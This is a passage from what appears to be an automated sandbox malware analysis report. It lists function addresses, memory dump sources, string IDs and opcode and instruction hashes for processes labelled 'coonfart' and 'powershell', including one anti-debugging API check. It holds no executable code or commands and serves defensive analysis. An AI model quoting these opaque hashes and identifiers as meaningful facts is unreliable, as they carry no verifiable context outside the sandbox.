                                  • Instruction ID: f22e0bcb7e9f2389a72f68a7c32bcacb8ad6ffb5f46ddab44a8ecf06d6ebc555
                                  • Opcode Fuzzy Hash: b210ca9005b22724c511572e8c03dbe10301a78584f17e5f5be0f827ab549159
                                  • Instruction Fuzzy Hash: 4461353190CA4C8FCB19DFA8C8596E97BF1FF59310F04416EE08AC3192DB38A946CB91
                                  Function 00007FFD9BAA7AD1 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2934430956.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID: CheckDebuggerPresentRemote
                                  • String ID:
                                  • API String ID: 3662101638-0
                                  • Opcode ID: 5019649d89aea01a17b6125c610519ab8e7a3c6a04668a0e6ddb7279f351b416
                                  • Instruction ID: 4bd12cedada0aff1bb578a1339c0fe6326cc92429ccc843ee18276525e42718b
                                  • Opcode Fuzzy Hash: 5019649d89aea01a17b6125c610519ab8e7a3c6a04668a0e6ddb7279f351b416
                                  • Instruction Fuzzy Hash: 2061543190D68C8FCB55DF68C8456EA7FF0FF15320F0502AAD459C71A2DA78A945C791

                                  Executed Functions

                                  Function 00007FFD9BB9660A Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1861013891.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9bb90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: X7MX
                                  • API String ID: 0-784262090
                                  • Opcode ID: b7899c12ca1ec893207700833dd1bcbff970cec3500d1762e4ea86f1a18b8118
                                  • Instruction ID: 9f6db45bddec20d6c7d25582df9b572834c093d237da068a93b45fe0a0b77d19
                                  • Opcode Fuzzy Hash: b7899c12ca1ec893207700833dd1bcbff970cec3500d1762e4ea86f1a18b8118
                                  • Instruction Fuzzy Hash: 8DD12732A0FA8E0FE765AB6888755B57BA0FF16398B0901BFD45EC70E3D918A905C341
                                  Function 00007FFD9B9AE380 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1859355324.00007FFD9B9AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9AD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9b9ad000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .`qG
                                  • API String ID: 0-4158804149
                                  • Opcode ID: 93bf0f6f77ac8c80904ce92e69d7fcefa3bfd21dbba5ebfa23f8d5418f155cf7
                                  • Instruction ID: fd995c6eebbed06d0e585ee70449ae89688898f9c474dea8059214187d550d76
                                  • Opcode Fuzzy Hash: 93bf0f6f77ac8c80904ce92e69d7fcefa3bfd21dbba5ebfa23f8d5418f155cf7
                                  • Instruction Fuzzy Hash: 7841277050EFC85FE7669B7898559523FF0EF52310B2605EFD088CB1A3DA25E806C792
                                  Function 00007FFD9BB94073 Relevance: .2, Instructions: 186COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1861013891.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9bb90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86d8d1884b5c141d6440e94b2b5c8bda665390e4c35ffe0edbafd409bb4b79af
                                  • Instruction ID: 2b72320196a2a0ea2fb4afbcf5907e0711ef965e4e08bd260640a0f333435176
                                  • Opcode Fuzzy Hash: 86d8d1884b5c141d6440e94b2b5c8bda665390e4c35ffe0edbafd409bb4b79af
                                  • Instruction Fuzzy Hash: EC513322B0EA5A0FE7B9CA6C94226747BD2FF95328B1A01BFD15DC71E7DE14E8018341
                                  Function 00007FFD9BB94370 Relevance: .1, Instructions: 146COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1861013891.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9bb90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 71f28f2ea5d5f240a862ad28dd37247e95b5ac19bc7856d0860f45a4775e26e9
                                  • Instruction ID: b2d00f15a9126aa3767937409efaa4eba275ce1b8a9b404135d3c2c2bbaabd0c
                                  • Opcode Fuzzy Hash: 71f28f2ea5d5f240a862ad28dd37247e95b5ac19bc7856d0860f45a4775e26e9
                                  • Instruction Fuzzy Hash: EF410222B0EA494FEBB9D668A4715B577D1FF84328B0A01BED15DC71E7EE14AD018381
                                  Function 00007FFD9BAC9738 Relevance: .1, Instructions: 143COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1860193001.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4d11c722d27748a19fc6d9bb0b5a901e33aba798fd764cc644a2612b2fd9877f
                                  • Instruction ID: b40dc13dac117dc7baaaf30c610a5308b8f4e29bcd3e8a458504ac23a497f0aa
                                  • Opcode Fuzzy Hash: 4d11c722d27748a19fc6d9bb0b5a901e33aba798fd764cc644a2612b2fd9877f
                                  • Instruction Fuzzy Hash: 8B411831A0DB884FDB59AF5C981A6F87BE0FB95310F14422FE44CC3292CA60A9558BC2
                                  Function 00007FFD9BACA47C Relevance: .1, Instructions: 101COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1860193001.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77b90bef153ee694c99e155d3fc6094435b3be6c240bb6f41072c9b7adee31cb
                                  • Instruction ID: 0ae8c6f82051dcab0c13c0777dd514cb5e54c81625bb0257de6d727644ca379c
                                  • Opcode Fuzzy Hash: 77b90bef153ee694c99e155d3fc6094435b3be6c240bb6f41072c9b7adee31cb
                                  • Instruction Fuzzy Hash: 7A210A3090C64C8FEB58EF9CD84A7F97BF0EB96321F04426BD449C7156DA74A416CB91
                                  Function 00007FFD9BB940BF Relevance: .1, Instructions: 99COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1861013891.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9bb90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7bf50fc180ec0d26bc8f23ca9e0c0d5944a874b6eabd8964ff2e07a687641093
                                  • Instruction ID: aa664e2da780dff3be2a00fa26e5ce5dd5b8321eed159c65380a1612e0524627
                                  • Opcode Fuzzy Hash: 7bf50fc180ec0d26bc8f23ca9e0c0d5944a874b6eabd8964ff2e07a687641093
                                  • Instruction Fuzzy Hash: FC21BF22B0FA9A4FE7B9DA5884721746AD1FF6531CB5A01BED05DC71E2DE28ED018341
                                  Function 00007FFD9BACA065 Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1860193001.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cc6a4c3bef090fcb44ce30e97d8b436b1044b8510d302b6dd31ea497968f01b4
                                  • Instruction ID: 2e2b2628a51e31018b32e27b9005b7d209c2fac4f1953229ae4d3bfbad396c5d
                                  • Opcode Fuzzy Hash: cc6a4c3bef090fcb44ce30e97d8b436b1044b8510d302b6dd31ea497968f01b4
                                  • Instruction Fuzzy Hash: 7B314932A0D6865FD715BB6C98724F53B60EF1121EB4902F7E8AD8F0E7DD142404C792
                                  Function 00007FFD9BB943BC Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1861013891.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9bb90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 257e8b6ec45deef4443ba6da30a02b2dc644799f0a0fcc9cbdd718a9a4b072f5
                                  • Instruction ID: cd783ffe92df504627cfe9a8ae663f0f18956ccf831e46bd2fb7f6c3c9705829
                                  • Opcode Fuzzy Hash: 257e8b6ec45deef4443ba6da30a02b2dc644799f0a0fcc9cbdd718a9a4b072f5
                                  • Instruction Fuzzy Hash: F6119E32B0F5494FEBB9D66894705B477D0FF4432875600BAE55DC75E2DA18AD018241
                                  Function 00007FFD9BAC33B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1860193001.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction ID: ee59faf03481a4826278b3042e26341a3348b81f49576dea66fea955f9f1e53b
                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction Fuzzy Hash: 5801447121CB0C4FD748EF0CE451AA5B7E0FB95364F10066DE58AC76A5DA36E882CB45

                                  Non-executed Functions

                                  Function 00007FFD9BAC8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1860193001.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                  • API String ID: 0-3225005683
                                  • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                  • Instruction ID: 43fdcd20ffc9d2af122bb42f72b332c49d5e1598f20534deb8450d3e3c738289
                                  • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                  • Instruction Fuzzy Hash: 0D21F6B77085255ED315BBBDBC159ED3740CFA827A34552F3E2A98F093EA147086CAD0

                                  Executed Functions

                                  Function 00007FFD9BBA6605 Relevance: .4, Instructions: 441COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.1970908047.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_7ffd9bba0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f79c078f835db328bf9fcd79eb27e6aceef166cc92749d23f647b5477bb3488f
                                  • Instruction ID: 4319d3c3b4a02961e9b9e4956d5ef8f692bf21c5ae6076fc8503d343d9acd715
                                  • Opcode Fuzzy Hash: f79c078f835db328bf9fcd79eb27e6aceef166cc92749d23f647b5477bb3488f
                                  • Instruction Fuzzy Hash: C4D12772E0E68E0FEBA5A7A848655B97BE1FF16218B0901FFD45EC70E3D918A905C341
                                  Function 00007FFD9BBA4073 Relevance: .2, Instructions: 186COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.1970908047.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_7ffd9bba0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b51aae79bcbb2d436a74733c7b38e73a12a3bc942bccdd78a34c412fce3c4f6c
                                  • Instruction ID: b58a16dc63235d82c4b0fd76be0e8d7c1e9bd2977a56cd4053469b56cf85c110
                                  • Opcode Fuzzy Hash: b51aae79bcbb2d436a74733c7b38e73a12a3bc942bccdd78a34c412fce3c4f6c
                                  • Instruction Fuzzy Hash: 73513522F0EA4A0FE7A9CA5C44226747BD2FF94324B1A01BFD15DC71E3DE14E8018381
                                  Function 00007FFD9BAD9750 Relevance: .2, Instructions: 153COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.1969967114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e55aa7b6a2351b9803421b38e21ef78a578ce5dd0dd8938e13a2af8d3913deb
                                  • Instruction ID: e17861de91ed895ea59546b696d59f3fccac0932787d030864ca1222d2234aaa
                                  • Opcode Fuzzy Hash: 2e55aa7b6a2351b9803421b38e21ef78a578ce5dd0dd8938e13a2af8d3913deb
                                  • Instruction Fuzzy Hash: 21413871A0DB894FE7199F5C9C0A6B8BFE0FB95310F0441BFE49C83193DA64A949C782
                                  Function 00007FFD9BBA4370 Relevance: .1, Instructions: 146COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.1970908047.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_7ffd9bba0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25229e9fbb8f83055d9b7e3fdc6314d6fd7dd8a73a42fca31b0d79e603a8b3f2
                                  • Instruction ID: 57b4a030df76f125dd8ef45a43c8ebdfbe0044157c83c2cafd0cc084258a9a66
                                  • Opcode Fuzzy Hash: 25229e9fbb8f83055d9b7e3fdc6314d6fd7dd8a73a42fca31b0d79e603a8b3f2
                                  • Instruction Fuzzy Hash: 39410332F0EA494FEBA9E66854715B877D1FF84724B0A01BED15DC71E7EE14AD018381
                                  Function 00007FFD9B9BE540 Relevance: .1, Instructions: 125COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.1968984311.00007FFD9B9BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9BD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_7ffd9b9bd000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 290c4172bce9bfa990cbdd6dcd8375b29388e2249b004fc0f45f343cd7110b95
                                  • Instruction ID: 2245340b31ed03c6bec8785ef32dc5557a2d38f60fcd0dc6d7a17caff322be63
                                  • Opcode Fuzzy Hash: 290c4172bce9bfa990cbdd6dcd8375b29388e2249b004fc0f45f343cd7110b95
                                  • Instruction Fuzzy Hash: BE41267041EFC85FE7968B3898559523FF4EF52320B1A06DFD088CB1A7D625A845CB92
                                  Function 00007FFD9BADA4BC Relevance: .1, Instructions: 100COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.1969967114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 17881bbeece17421fdb09816f62da900eef9c48c386c411bde4d596f9cb558a6
                                  • Instruction ID: 64efbf9dd3b5285f184a85c0b8db013e3dc8bdce2f674e26c4d1766146441c0f
                                  • Opcode Fuzzy Hash: 17881bbeece17421fdb09816f62da900eef9c48c386c411bde4d596f9cb558a6
                                  • Instruction Fuzzy Hash: 5021283090C74C4FDB59DBACD84ABE97FE0EB96321F04426FD049C7162D674A40ACB91
                                  Function 00007FFD9BBA40BF Relevance: .1, Instructions: 99COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.1970908047.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_7ffd9bba0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9d6582b5c0cd90a82d75d4fe3bc0b2657e23b78f69cd5deea5ce2eaeb5850b2e
                                  • Instruction ID: 8f3f31c0d16038c2a886e833c10323ba73bb447c9b18f40053037942512afcda
                                  • Opcode Fuzzy Hash: 9d6582b5c0cd90a82d75d4fe3bc0b2657e23b78f69cd5deea5ce2eaeb5850b2e
                                  • Instruction Fuzzy Hash: 9B21AE22F0EA8A4FE7B9DA5844621746AD1FF65228B5A01BED05DC71E2DE28ED058341
                                  Function 00007FFD9BBA43BC Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.1970908047.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_7ffd9bba0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 149fa8b149a65b74720b5563e32eb085f53246f4d58e4dffa9e867541377159d
                                  • Instruction ID: be37ddf4c1d7db2740ba96e6a888439b47d0ad11a57fb59b08bca892a17bc22f
                                  • Opcode Fuzzy Hash: 149fa8b149a65b74720b5563e32eb085f53246f4d58e4dffa9e867541377159d
                                  • Instruction Fuzzy Hash: 8811CE32E0F5494FE7A4E65894705B436D0FF4432874600BAE12DC75E2DE18AD008240
                                  Function 00007FFD9BADA0FB Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.1969967114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3cd93356a1463f4d4f28ff555b6bc0498ce500e0181337948aece19b2580e779
                                  • Instruction ID: 296d2ceb67c60ef4a0224e054a89ec95b70b2560ea98d9a1348d41861dc4567e
                                  • Opcode Fuzzy Hash: 3cd93356a1463f4d4f28ff555b6bc0498ce500e0181337948aece19b2580e779
                                  • Instruction Fuzzy Hash: 9B11C87A98FBCE0FDB529F6898A50D47FA0FF61200B0603BBE188C7062EA5569098741
                                  Function 00007FFD9BAD33B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.1969967114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                  • Instruction ID: c6d341720b75168737bcbbb658bbc6ed62dea96e630f77678b5119a0e236c73e
                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                  • Instruction Fuzzy Hash: EF01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10066DE58AC76A5DA36E882CB45

                                  Non-executed Functions

                                  Function 00007FFD9BAD8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.1969967114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                  • API String ID: 0-2350917820
                                  • Opcode ID: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
                                  • Instruction ID: 68706fd38280e95dbe556879bdf64a4c88f95ab225e6ad10c9ade5bef371666a
                                  • Opcode Fuzzy Hash: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
                                  • Instruction Fuzzy Hash: 4021F273A085155ACB1676ACBC519D867A0DF6837E34502F3F428CF093D918A48B8680
                                  Function 00007FFD9BAD89F2 Relevance: 5.1, Strings: 4, Instructions: 90COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.1969967114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_7ffd9bad0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: K_^$K_^$K_^$K_^
                                  • API String ID: 0-3666970850
                                  • Opcode ID: f7af087bbb81df3482801f28b4b7c3ca217ef0d0fea6360d3b350f743720a386
                                  • Instruction ID: 2664f21b3d0235cf6a3b4e9f532d1598b6bf4da37f71ad47ca346c69427890b6
                                  • Opcode Fuzzy Hash: f7af087bbb81df3482801f28b4b7c3ca217ef0d0fea6360d3b350f743720a386
                                  • Instruction Fuzzy Hash: 0531C7A2F0F6D60BEB26576948B55D53FA0EF5222870E43F6C4E88F0A7EC1869068211

                                  Executed Functions

                                  Function 00007FFD9BAA16D9 Relevance: .8, Instructions: 818COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.1963350845.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1eaf6258d4d2526b0afb2b9060c884526127cd05ba74b07c82b7c6b92a086bd
                                  • Instruction ID: dc1e3f5c7369506948d1adcd315aaed95e456fc0755d77d9012c091711e39c4a
                                  • Opcode Fuzzy Hash: c1eaf6258d4d2526b0afb2b9060c884526127cd05ba74b07c82b7c6b92a086bd
                                  • Instruction Fuzzy Hash: 76420721B29A494FE768EB788475BBC77D2FFA9314F54067DE04EC32D6CE68A8418341
                                  Function 00007FFD9BAA2141 Relevance: .2, Instructions: 210COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.1963350845.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25ab4eae3456c889171830a04c9a3e7dde2609e61bb94967e381af2d990a0808
                                  • Instruction ID: 698358c478637d38f940dc45fcbd3a684d06a47b031681d42f015c76a33747b9
                                  • Opcode Fuzzy Hash: 25ab4eae3456c889171830a04c9a3e7dde2609e61bb94967e381af2d990a0808
                                  • Instruction Fuzzy Hash: 46512E20B1E6C90FD796ABB84834675BFE5DF87225B0805FBE0C9CA2E7DD481846C352
                                  Function 00007FFD9BAA1255 Relevance: .5, Instructions: 472COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.1963350845.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: df846c3f8ba7d1837057eb8fe1bccb196d1fbeed9d2897238d70289db9bdbde1
                                  • Instruction ID: 73f951f764945c2598c530d0b4bf74a64e82540db1a86f3386b08f3a9f7c57b7
                                  • Opcode Fuzzy Hash: df846c3f8ba7d1837057eb8fe1bccb196d1fbeed9d2897238d70289db9bdbde1
                                  • Instruction Fuzzy Hash: A631C733A0E7864FD715E77C98B50E57BB1EF5222970901BBD095CE0A3DD18694AC350
                                  Function 00007FFD9BAA1242 Relevance: .5, Instructions: 466COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.1963350845.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f3e1608f22e103fd514254c19dd4a3a9782da5d7ba987fe1282241f86aabbf53
                                  • Instruction ID: c6bae162e3bb159b67c3cb7ca945fc7aff504f20af0e122972d4680f6693a8a4
                                  • Opcode Fuzzy Hash: f3e1608f22e103fd514254c19dd4a3a9782da5d7ba987fe1282241f86aabbf53
                                  • Instruction Fuzzy Hash: A121F823F0E7CA1FE761976C98B10D97BA1EFA2265B0901BBC0D4CE0E3DC14684AC360
                                  Function 00007FFD9BAA0E4E Relevance: .2, Instructions: 207COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.1963350845.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 71952f15e00e98e14f73c5a970e60c9c2beb480764a56ee24d59b6968bbf119a
                                  • Instruction ID: 0159892c35592c1cd8dd83b13db16cfd5c17247121fb9a47fabe50fe887d0e65
                                  • Opcode Fuzzy Hash: 71952f15e00e98e14f73c5a970e60c9c2beb480764a56ee24d59b6968bbf119a
                                  • Instruction Fuzzy Hash: F6512621B0E68A0FE366A77C98255B93BD2DF8623570941FBE48DCB1E7DC085C468362
                                  Function 00007FFD9BAA0B5F Relevance: .2, Instructions: 159COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.1963350845.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 26b3b6e7cfc0d5def515460c3eb76c3271fdbb8b1d907b6fd7b870309aa787cf
                                  • Instruction ID: 45f78b536514b8c0e3ae822be62ce2376063eb0c59ff93f2bdfb7a9149272602
                                  • Opcode Fuzzy Hash: 26b3b6e7cfc0d5def515460c3eb76c3271fdbb8b1d907b6fd7b870309aa787cf
                                  • Instruction Fuzzy Hash: 5A41D436B14A1E8FDB44EBA8D861AED77A1FF98319F50067AD008D72D6CE346845C790
                                  Function 00007FFD9BAA07A5 Relevance: .2, Instructions: 155COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.1963350845.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID:
